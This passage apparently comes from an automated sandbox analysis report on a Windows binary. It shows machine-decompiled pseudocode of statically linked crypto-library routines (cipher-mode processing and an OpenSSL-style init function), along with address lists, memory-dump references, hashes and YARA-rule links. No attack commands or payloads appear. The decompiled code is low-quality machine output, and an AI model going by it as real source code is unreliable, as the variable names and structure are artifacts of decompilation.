										 *(_t98 + _t140) =  *(_t98 + _t155) ^  *_t98;
										__eflags = _t123 - _t146;
									} while (_t123 < _t146);
								}
								goto L21;
							}
						} else {
							_a20(_t107, _a12, _t151, _a4, _t148,  &(_t148[4]));
							_t143 = _t151 << 4;
							_a12 = _a12 + _t143;
							_t157 = _t157 + 0x18;
							_t107 = _t107 + _t143;
							_t146 = _t146 - _t143;
							__eflags = _t146;
							if(_t146 == 0) {
								L21:
								_t133 = _a8;
							} else {
								__eflags = _t143 >> 4;
								E00B9CFA0(_t148, _t143 >> 4);
								_t133 = _a8;
								goto L14;
							}
						}
						__eflags = _t133 - 0x10;
						if(_t133 < 0x10) {
							__eflags = 0x10;
							E00C6BB40(_t146, _t148 + _t133, 0, 0x10 - _t133);
							_t157 = _t157 + 0xc;
						}
						_a16( &_a24, _a4);
						_t148[4] = _t148[4] ^ _a24;
						_t148[5] = _t148[5] ^ _a28;
						_t148[7] = _t148[7] ^ _a36;
						_t148[6] = _t148[6] ^ _a32;
						 *_t148 = _a3;
						__eflags = 0;
						return E00C69C26(0, _t107, _a40 ^ _t157 + 0x0000000c, _a3, _t146, _t148, _t148);
					} else {
						if(__eflags > 0) {
							L10:
							__eflags = _a40 ^ _t157;
							return E00C69C26(0xfffffffe, _t107, _a40 ^ _t157, _t133, _t146, _t148);
						} else {
							__eflags = _t148[8];
							if(_t148[8] <= 0) {
								goto L11;
							} else {
								goto L10;
							}
						}
					}
				} else {
					return E00C69C26(_t84 | 0xffffffff, _t107, _a40 ^ _t157, _t133, _t146, _t148);
				}
			}




























                                                              0x00b9cfe0
                                                              0x00b9cfe5
                                                              0x00b9cfea
                                                              0x00b9cff1
                                                              0x00b9cffe
                                                              0x00b9d003
                                                              0x00b9d007
                                                              0x00b9d00a
                                                              0x00b9d00e
                                                              0x00b9d010
                                                              0x00b9d014
                                                              0x00b9d018
                                                              0x00b9d01c
                                                              0x00b9d020
                                                              0x00b9d026
                                                              0x00b9d02e
                                                              0x00b9d030
                                                              0x00b9d034
                                                              0x00b9d037
                                                              0x00b9d03b
                                                              0x00b9d03b
                                                              0x00b9d042
                                                              0x00b9d04a
                                                              0x00b9d04c
                                                              0x00b9d04e
                                                              0x00b9d050
                                                              0x00b9d052
                                                              0x00b9d059
                                                              0x00b9d060
                                                              0x00b9d064
                                                              0x00b9d066
                                                              0x00b9d06a
                                                              0x00b9d06b
                                                              0x00b9d06e
                                                              0x00b9d060
                                                              0x00b9d073
                                                              0x00b9d077
                                                              0x00b9d07d
                                                              0x00b9d083
                                                              0x00b9d0a3
                                                              0x00b9d0a6
                                                              0x00b9d0aa
                                                              0x00b9d0b1
                                                              0x00b9d0d2
                                                              0x00b9d0d2
                                                              0x00b9d0d5
                                                              0x00b9d0d8
                                                              0x00b9d0da
                                                              0x00b9d111
                                                              0x00b9d111
                                                              0x00b9d113
                                                              0x00b9d115
                                                              0x00b9d117
                                                              0x00b9d119
                                                              0x00b9d120
                                                              0x00b9d123
                                                              0x00b9d127
                                                              0x00b9d128
                                                              0x00b9d128
                                                              0x00b9d120
                                                              0x00b9d130
                                                              0x00b9d134
                                                              0x00b9d13a
                                                              0x00b9d147
                                                              0x00b9d149
                                                              0x00b9d14c
                                                              0x00b9d14e
                                                              0x00b9d150
                                                              0x00b9d158
                                                              0x00b9d162
                                                              0x00b9d162
                                                              0x00b9d164
                                                              0x00b9d164
                                                              0x00b9d16b
                                                              0x00b9d16d
                                                              0x00b9d16e
                                                              0x00b9d171
                                                              0x00b9d171
                                                              0x00b9d164
                                                              0x00000000
                                                              0x00b9d150
                                                              0x00b9d0dc
                                                              0x00b9d0ed
                                                              0x00b9d0f4
                                                              0x00b9d0f6
                                                              0x00b9d0fa
                                                              0x00b9d0fd
                                                              0x00b9d0ff
                                                              0x00b9d0ff
                                                              0x00b9d101
                                                              0x00b9d175
                                                              0x00b9d175
                                                              0x00b9d103
                                                              0x00b9d103
                                                              0x00b9d108
                                                              0x00b9d10d
                                                              0x00000000
                                                              0x00b9d10d
                                                              0x00b9d101
                                                              0x00b9d17a
                                                              0x00b9d17d
                                                              0x00b9d184
                                                              0x00b9d18d
                                                              0x00b9d192
                                                              0x00b9d192
                                                              0x00b9d1a0
                                                              0x00b9d1a8
                                                              0x00b9d1af
                                                              0x00b9d1ba
                                                              0x00b9d1bd
                                                              0x00b9d1cc
                                                              0x00b9d1d2
                                                              0x00b9d1dc
                                                              0x00b9d0b3
                                                              0x00b9d0b3
                                                              0x00b9d0bd
                                                              0x00b9d0c7
                                                              0x00b9d0d1
                                                              0x00b9d0b5
                                                              0x00b9d0b5
                                                              0x00b9d0b9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9d0b9
                                                              0x00b9d0b3
                                                              0x00b9d087
                                                              0x00b9d099
                                                              0x00b9d099

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 410fb0ae2311d2d737292acce14efb9efda0ba66e7acb74dde3bb45d68b4de34
                                                              • Instruction ID: 15345c722a83a69ee68ed920998c199286a7e7f26444fc94d46dd7c9536ca2f1
                                                              • Opcode Fuzzy Hash: 410fb0ae2311d2d737292acce14efb9efda0ba66e7acb74dde3bb45d68b4de34
                                                              • Instruction Fuzzy Hash: D161B2721087409FC718CF29C89166BBBE5EFC9310F444A6EF4CA87251D730E949CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9CD90, Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID:
                                                              • API String ID: 2102423945-0
                                                              • Opcode ID: dde2d3d5800538196e0dfdcde06d3f1417afb7c0616ccc847a13b2c2f3dffb1c
                                                              • Instruction ID: 651ad4b87f9805a2297577e33b1dfe45a46721001ef3cf6aba5ab6a26dcc7fcf
                                                              • Opcode Fuzzy Hash: dde2d3d5800538196e0dfdcde06d3f1417afb7c0616ccc847a13b2c2f3dffb1c
                                                              • Instruction Fuzzy Hash: E3615A716087419FC718CF29C491A6BBBE5FFD9304F448A6DF49A87242D630EA49CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9D1E0, Relevance: 1.7, APIs: 1, Instructions: 159COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 15%
                                                              			E00B9D1E0(intOrPtr __edi, void* __ebp, signed char _a3, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, signed int* _a52, intOrPtr _a56, intOrPtr _a60, unsigned int _a64, signed int _a68) {
				void* __ebx;
				void* __esi;
				signed int _t71;
				signed int _t74;
				signed int _t76;
				intOrPtr _t77;
				void* _t89;
				signed int* _t90;
				signed char _t98;
				intOrPtr _t100;
				void* _t102;
				signed int _t104;
				signed int _t105;
				signed int* _t112;
				signed char _t114;
				signed int _t120;
				signed int* _t129;
				unsigned int _t131;
				intOrPtr _t133;
				signed int _t135;
				intOrPtr _t136;
				void* _t138;
				signed int* _t140;
				unsigned int _t142;
				signed int _t143;
				void* _t146;

				_t133 = __edi;
				E00C6BB10(0x30);
				_t71 =  *0xcc5970; // 0x851ab4dd
				_a44 = _t71 ^ _t143;
				_t122 = _a68;
				_t140 = _a52;
				_t98 =  *_t140;
				_a12 = _a56;
				_t74 = _t140[0xa];
				_a8 = _a60;
				_t104 = _t140[0xb];
				_a24 = _a68;
				_a3 = _t98;
				_a16 = _t74;
				_a4 = _t104;
				if((_t98 & 0x00000040) == 0) {
					 *_t74(_t140,  &(_t140[4]), _t104);
					_t143 = _t143 + 0xc;
				}
				_t76 = _t98 & 7;
				_t100 = 0xf - _t76;
				 *_t140 = _t76;
				_t77 = 0xf;
				_t105 = 0;
				_a20 = 0xf;
				if(0xf < 0xf) {
					do {
						_t122 =  *(_t140 + _t77) & 0x000000ff;
						_t120 = _t105 |  *(_t140 + _t77) & 0x000000ff;
						 *(_t140 + _t77) = 0;
						_t77 = _t77 + 1;
						_t105 = _t120 << 8;
					} while (_t77 < 0xf);
				}
				_t78 = _t140[3] & 0x000000ff;
				_t142 = _a64;
				_t140[3] = 1;
				if((_t105 | _t140[3] & 0x000000ff) == _t142) {
					_push(_t133);
					_t135 = _t142 >> 4;
					if(_t135 == 0) {
						L9:
						if(_t142 != 0) {
							_a16(_t140,  &_a28, _a4);
							_t146 = _t143 + 0xc;
							_t89 = 0;
							if(_t142 > 0) {
								_t112 =  &_a28;
								_t138 = _a12 - _t112;
								_t102 = _a8 - _t112;
								do {
									_t129 = _t146 + _t89 + 0x2c;
									_t114 =  *(_t138 + _t129) ^  *_t129;
									_t89 = _t89 + 1;
									 *(_t102 + _t129) = _t114;
									 *(_t140 + _t89 + 0xf) =  *(_t140 + _t89 + 0xf) ^ _t114;
								} while (_t89 < _t142);
								_t100 = _a20;
							}
							_t90 =  &(_t140[4]);
							_a16(_t90, _t90, _a4);
							_t143 = _t146 + 0xc;
						}
					} else {
						_a24(_a12, _a8, _t135, _a4, _t140,  &(_t140[4]));
						_t131 = _t135 << 4;
						_a12 = _a12 + _t131;
						_a8 = _a8 + _t131;
						_t143 = _t143 + 0x18;
						_t142 = _t142 - _t131;
						if(_t142 != 0) {
							E00B9CFA0(_t140, _t131 >> 4);
							goto L9;
						}
					}
					_pop(_t136);
					if(_t100 < 0x10) {
						E00C6BB40(_t136, _t140 + _t100, 0, 0x10 - _t100);
						_t143 = _t143 + 0xc;
					}
					_a16( &_a28, _a4);
					_t140[5] = _t140[5] ^ _a32;
					_t140[4] = _t140[4] ^ _a28;
					_t140[6] = _t140[6] ^ _a36;
					_t140[7] = _t140[7] ^ _a40;
					 *_t140 = _a3;
					return E00C69C26(0, _t100, _a44 ^ _t143 + 0x0000000c, _a40, _t136, _t140, _t140);
				} else {
					return E00C69C26(_t78 | 0xffffffff, _t100, _a44 ^ _t143, _t122, _t133, _t140);
				}
			}





























                                                              0x00b9d1e0
                                                              0x00b9d1e5
                                                              0x00b9d1ea
                                                              0x00b9d1f1
                                                              0x00b9d1fd
                                                              0x00b9d204
                                                              0x00b9d208
                                                              0x00b9d20a
                                                              0x00b9d20e
                                                              0x00b9d211
                                                              0x00b9d215
                                                              0x00b9d218
                                                              0x00b9d21c
                                                              0x00b9d220
                                                              0x00b9d224
                                                              0x00b9d22b
                                                              0x00b9d233
                                                              0x00b9d235
                                                              0x00b9d235
                                                              0x00b9d23b
                                                              0x00b9d243
                                                              0x00b9d245
                                                              0x00b9d247
                                                              0x00b9d249
                                                              0x00b9d24b
                                                              0x00b9d252
                                                              0x00b9d254
                                                              0x00b9d254
                                                              0x00b9d258
                                                              0x00b9d25a
                                                              0x00b9d25e
                                                              0x00b9d25f
                                                              0x00b9d262
                                                              0x00b9d254
                                                              0x00b9d267
                                                              0x00b9d26b
                                                              0x00b9d271
                                                              0x00b9d277
                                                              0x00b9d28e
                                                              0x00b9d291
                                                              0x00b9d296
                                                              0x00b9d2cf
                                                              0x00b9d2d1
                                                              0x00b9d2de
                                                              0x00b9d2e2
                                                              0x00b9d2e5
                                                              0x00b9d2e9
                                                              0x00b9d2f3
                                                              0x00b9d2f9
                                                              0x00b9d2fb
                                                              0x00b9d300
                                                              0x00b9d300
                                                              0x00b9d307
                                                              0x00b9d309
                                                              0x00b9d30a
                                                              0x00b9d30d
                                                              0x00b9d311
                                                              0x00b9d315
                                                              0x00b9d315
                                                              0x00b9d31d
                                                              0x00b9d323
                                                              0x00b9d327
                                                              0x00b9d327
                                                              0x00b9d298
                                                              0x00b9d2ad
                                                              0x00b9d2b4
                                                              0x00b9d2b6
                                                              0x00b9d2ba
                                                              0x00b9d2be
                                                              0x00b9d2c1
                                                              0x00b9d2c3
                                                              0x00b9d2ca
                                                              0x00000000
                                                              0x00b9d2ca
                                                              0x00b9d2c3
                                                              0x00b9d32a
                                                              0x00b9d32e
                                                              0x00b9d33e
                                                              0x00b9d343
                                                              0x00b9d343
                                                              0x00b9d351
                                                              0x00b9d35d
                                                              0x00b9d360
                                                              0x00b9d367
                                                              0x00b9d372
                                                              0x00b9d37c
                                                              0x00b9d38d
                                                              0x00b9d27b
                                                              0x00b9d28d
                                                              0x00b9d28d

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID:
                                                              • API String ID: 2102423945-0
                                                              • Opcode ID: 360737a0d0923fc1474a31caeeae8da57f0600eecab5f8cc646aa173639f0f77
                                                              • Instruction ID: 36b324f7e1729bb6aec208b1bee25127b708e59a321adeb0a11586cc80148804
                                                              • Opcode Fuzzy Hash: 360737a0d0923fc1474a31caeeae8da57f0600eecab5f8cc646aa173639f0f77
                                                              • Instruction Fuzzy Hash: 76516B716087419FC729CF69C89096BFBE5EFC9314F448A6EF4DA87241D630E909CB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BB4FA0, Relevance: 1.5, Strings: 1, Instructions: 248COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 86%
                                                              			E00BB4FA0(void* __edi, signed int _a4, intOrPtr* _a12) {
				signed int _t32;
				signed int _t82;
				signed int _t86;
				signed int _t88;
				signed int _t90;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				intOrPtr _t98;
				intOrPtr* _t100;
				signed int _t101;
				signed int _t103;
				signed int _t105;
				signed int _t107;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t115;
				intOrPtr _t134;
				signed int _t140;
				void* _t145;
				void* _t146;
				void* _t148;

				_t135 = __edi;
				if( *0xcc904c == 0) {
					_t32 = E00BA4700(0xcc9058, 0xbb4f50);
					_t146 = _t145 + 8;
					asm("sbb eax, eax");
					if(( *0xcc9060 &  ~_t32) == 0) {
						goto L3;
					} else {
						_t140 = _a4;
						if((_t140 & 0x00000001) == 0) {
							L7:
							if((_t140 & 0x00000002) == 0) {
								L9:
								if((_t140 & 0x00000010) == 0) {
									L11:
									if((_t140 & 0x00000004) == 0) {
										L13:
										if((_t140 & 0x00000020) == 0) {
											L15:
											if((_t140 & 0x00000008) == 0) {
												L17:
												if((_t140 & 0x00000080) == 0) {
													L19:
													if((_t140 & 0x00000040) == 0) {
														L24:
														if((_t140 & 0x00000100) == 0) {
															L26:
															if((_t140 & 0x00000800) == 0) {
																L28:
																if((_t140 & 0x00000200) == 0) {
																	L30:
																	if((_t140 & 0x00000400) == 0) {
																		L32:
																		if((_t140 & 0x00004000) == 0) {
																			L34:
																			if((_t140 & 0x00002000) == 0) {
																				L36:
																				if((_t140 & 0x0000fe00) != 0) {
																					E00BD19D0(_t135);
																				}
																				if((_t140 & 0x00010000) == 0) {
																					L41:
																					return 1;
																				} else {
																					_t82 = E00BA4700(0xcc90cc, 0xbb4f40);
																					asm("sbb eax, eax");
																					if(( *0xcc90d4 &  ~_t82) != 0) {
																						goto L41;
																					} else {
																						goto L40;
																					}
																				}
																			} else {
																				_t86 = E00BA4700(0xcc90c4, 0xbb4f30);
																				_t146 = _t146 + 8;
																				asm("sbb eax, eax");
																				if(( *0xcc90c8 &  ~_t86) == 0) {
																					goto L40;
																				} else {
																					goto L36;
																				}
																			}
																		} else {
																			_t88 = E00BA4700(0xcc90bc, 0xbb4f20);
																			_t146 = _t146 + 8;
																			asm("sbb eax, eax");
																			if(( *0xcc90c0 &  ~_t88) == 0) {
																				goto L40;
																			} else {
																				goto L34;
																			}
																		}
																	} else {
																		_t90 = E00BA4700(0xcc90b4, 0xbb4f10);
																		_t146 = _t146 + 8;
																		asm("sbb eax, eax");
																		if(( *0xcc90b8 &  ~_t90) == 0) {
																			goto L40;
																		} else {
																			goto L32;
																		}
																	}
																} else {
																	_t92 = E00BA4700(0xcc90ac, 0xbb4f00);
																	_t146 = _t146 + 8;
																	asm("sbb eax, eax");
																	if(( *0xcc90b0 &  ~_t92) == 0) {
																		goto L40;
																	} else {
																		goto L30;
																	}
																}
															} else {
																_t94 = E00BA4700(0xcc90a4, 0xbb4ef0);
																_t146 = _t146 + 8;
																asm("sbb eax, eax");
																if(( *0xcc90a8 &  ~_t94) == 0) {
																	goto L40;
																} else {
																	goto L28;
																}
															}
														} else {
															_t96 = E00BA4700(0xcc9098, 0xbb4ed0);
															_t146 = _t146 + 8;
															asm("sbb eax, eax");
															if(( *0xcc90a0 &  ~_t96) == 0) {
																goto L40;
															} else {
																goto L26;
															}
														}
													} else {
														_t98 =  *0xcc9054; // 0x29258b0
														E00BA4690(_t98);
														_t100 = _a12;
														_t148 = _t146 + 4;
														if(_t100 != 0) {
															 *0xcc9048 =  *_t100;
														} else {
															 *0xcc9048 = _t100;
														}
														_t101 = E00BA4700(0xcc9088, 0xbb4e90);
														_t134 =  *0xcc9054; // 0x29258b0
														asm("sbb edi, edi");
														E00BA46B0(_t134);
														_t146 = _t148 + 0xc;
														_t135 = _t135;
														if(( ~_t101 &  *0xcc9090) == 0) {
															goto L40;
														} else {
															goto L24;
														}
													}
												} else {
													_t103 = E00BA4700(0xcc9088, 0xbb4eb0);
													_t146 = _t146 + 8;
													asm("sbb eax, eax");
													if(( *0xcc9094 &  ~_t103) == 0) {
														goto L40;
													} else {
														goto L19;
													}
												}
											} else {
												_t105 = E00BA4700(0xcc907c, 0xbb4e70);
												_t146 = _t146 + 8;
												asm("sbb eax, eax");
												if(( *0xcc9080 &  ~_t105) == 0) {
													goto L40;
												} else {
													goto L17;
												}
											}
										} else {
											_t107 = E00BA4700(0xcc907c, 0xbb4e80);
											_t146 = _t146 + 8;
											asm("sbb eax, eax");
											if(( *0xcc9084 &  ~_t107) == 0) {
												goto L40;
											} else {
												goto L15;
											}
										}
									} else {
										_t109 = E00BA4700(0xcc9074, 0xbb4e60);
										_t146 = _t146 + 8;
										asm("sbb eax, eax");
										if(( *0xcc9078 &  ~_t109) == 0) {
											goto L40;
										} else {
											goto L13;
										}
									}
								} else {
									_t111 = E00BA4700(0xcc9074, 0xbb4e80);
									_t146 = _t146 + 8;
									asm("sbb eax, eax");
									if(( *0xcc9084 &  ~_t111) == 0) {
										goto L40;
									} else {
										goto L11;
									}
								}
							} else {
								_t113 = E00BA4700(0xcc9064, 0xbb4e40);
								_t146 = _t146 + 8;
								asm("sbb eax, eax");
								if(( *0xcc9070 &  ~_t113) == 0) {
									goto L40;
								} else {
									goto L9;
								}
							}
						} else {
							_t115 = E00BA4700(0xcc9064, 0xbb4e30);
							_t146 = _t146 + 8;
							asm("sbb eax, eax");
							if(( *0xcc906c &  ~_t115) == 0) {
								L40:
								return 0;
							} else {
								goto L7;
							}
						}
					}
				} else {
					if( *0xcc90d8 == 0) {
						 *0xcc90d8 = 1;
						E00B98310(__edi, 0xf, 0x74, 0x46, "crypto\\init.c", 0x1d8);
					}
					L3:
					return 0;
				}
			}


























                                                              0x00bb4fa0
                                                              0x00bb4fa7
                                                              0x00bb4fe1
                                                              0x00bb4fe6
                                                              0x00bb4feb
                                                              0x00bb4ff3
                                                              0x00000000
                                                              0x00bb4ff5
                                                              0x00bb4ff6
                                                              0x00bb5003
                                                              0x00bb5027
                                                              0x00bb5030
                                                              0x00bb5054
                                                              0x00bb505d
                                                              0x00bb5081
                                                              0x00bb508a
                                                              0x00bb50ae
                                                              0x00bb50b7
                                                              0x00bb50db
                                                              0x00bb50e4
                                                              0x00bb5108
                                                              0x00bb5113
                                                              0x00bb5137
                                                              0x00bb5140
                                                              0x00bb519b
                                                              0x00bb51a6
                                                              0x00bb51ca
                                                              0x00bb51d5
                                                              0x00bb51f9
                                                              0x00bb5204
                                                              0x00bb5228
                                                              0x00bb5233
                                                              0x00bb5257
                                                              0x00bb5262
                                                              0x00bb5282
                                                              0x00bb528d
                                                              0x00bb52ad
                                                              0x00bb52b8
                                                              0x00bb52ba
                                                              0x00bb52ba
                                                              0x00bb52c9
                                                              0x00bb52ed
                                                              0x00bb52f3
                                                              0x00bb52cb
                                                              0x00bb52d5
                                                              0x00bb52df
                                                              0x00bb52e7
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb52e7
                                                              0x00bb528f
                                                              0x00bb5299
                                                              0x00bb529e
                                                              0x00bb52a3
                                                              0x00bb52ab
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb52ab
                                                              0x00bb5264
                                                              0x00bb526e
                                                              0x00bb5273
                                                              0x00bb5278
                                                              0x00bb5280
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb5280
                                                              0x00bb5235
                                                              0x00bb523f
                                                              0x00bb5244
                                                              0x00bb5249
                                                              0x00bb5251
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb5251
                                                              0x00bb5206
                                                              0x00bb5210
                                                              0x00bb5215
                                                              0x00bb521a
                                                              0x00bb5222
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb5222
                                                              0x00bb51d7
                                                              0x00bb51e1
                                                              0x00bb51e6
                                                              0x00bb51eb
                                                              0x00bb51f3
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb51f3
                                                              0x00bb51a8
                                                              0x00bb51b2
                                                              0x00bb51b7
                                                              0x00bb51bc
                                                              0x00bb51c4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb51c4
                                                              0x00bb5142
                                                              0x00bb5142
                                                              0x00bb5148
                                                              0x00bb514d
                                                              0x00bb5151
                                                              0x00bb5156
                                                              0x00bb5161
                                                              0x00bb5158
                                                              0x00bb5158
                                                              0x00bb5158
                                                              0x00bb5172
                                                              0x00bb5177
                                                              0x00bb5181
                                                              0x00bb518a
                                                              0x00bb518f
                                                              0x00bb5194
                                                              0x00bb5195
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb5195
                                                              0x00bb5115
                                                              0x00bb511f
                                                              0x00bb5124
                                                              0x00bb5129
                                                              0x00bb5131
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb5131
                                                              0x00bb50e6
                                                              0x00bb50f0
                                                              0x00bb50f5
                                                              0x00bb50fa
                                                              0x00bb5102
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb5102
                                                              0x00bb50b9
                                                              0x00bb50c3
                                                              0x00bb50c8
                                                              0x00bb50cd
                                                              0x00bb50d5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb50d5
                                                              0x00bb508c
                                                              0x00bb5096
                                                              0x00bb509b
                                                              0x00bb50a0
                                                              0x00bb50a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb50a8
                                                              0x00bb505f
                                                              0x00bb5069
                                                              0x00bb506e
                                                              0x00bb5073
                                                              0x00bb507b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb507b
                                                              0x00bb5032
                                                              0x00bb503c
                                                              0x00bb5041
                                                              0x00bb5046
                                                              0x00bb504e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb504e
                                                              0x00bb5005
                                                              0x00bb500f
                                                              0x00bb5014
                                                              0x00bb5019
                                                              0x00bb5021
                                                              0x00bb52e9
                                                              0x00bb52ec
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb5021
                                                              0x00bb5003
                                                              0x00bb4fa9
                                                              0x00bb4fb0
                                                              0x00bb4fc2
                                                              0x00bb4fcc
                                                              0x00bb4fd1
                                                              0x00bb4fd4
                                                              0x00bb4fd6
                                                              0x00bb4fd6

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CriticalEnterSection
                                                              • String ID: crypto\init.c
                                                              • API String ID: 1904992153-2222486511
                                                              • Opcode ID: 2bfd7f14384b3fc5c2e4e2c5e0d827b80141db12e93dc78d73cc68eae2b560bf
                                                              • Instruction ID: ae4ed0bd991460d681a11249171c010cf476edf42c505bbf52050329c608efd4
                                                              • Opcode Fuzzy Hash: 2bfd7f14384b3fc5c2e4e2c5e0d827b80141db12e93dc78d73cc68eae2b560bf
                                                              • Instruction Fuzzy Hash: 4071D775BA2A5267CF6456B8FC0BFFA31C0E799B11F0805BAF446D21D2EFE0D8048556
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BB9650, Relevance: 1.4, Strings: 1, Instructions: 147COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 94%
                                                              			E00BB9650(void* __esi, signed int _a4, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v0;
				void* __ebx;
				void* __edi;
				signed int _t27;
				signed int _t39;
				intOrPtr _t51;
				signed int _t56;
				signed int _t68;
				signed int _t73;
				signed char* _t82;
				intOrPtr _t84;
				signed int _t86;
				signed int _t94;
				signed int _t95;
				signed int _t99;
				void* _t100;
				void* _t102;
				void* _t104;

				_t27 = E00C6BB10(8);
				_t82 = 0;
				_t95 = _t94 | 0xffffffff;
				_a4 = 0;
				if(_a16 < 0) {
					L15:
					return _t27 | 0xffffffff;
				} else {
					_t51 = _a24;
					if(_t51 < 0) {
						goto L15;
					} else {
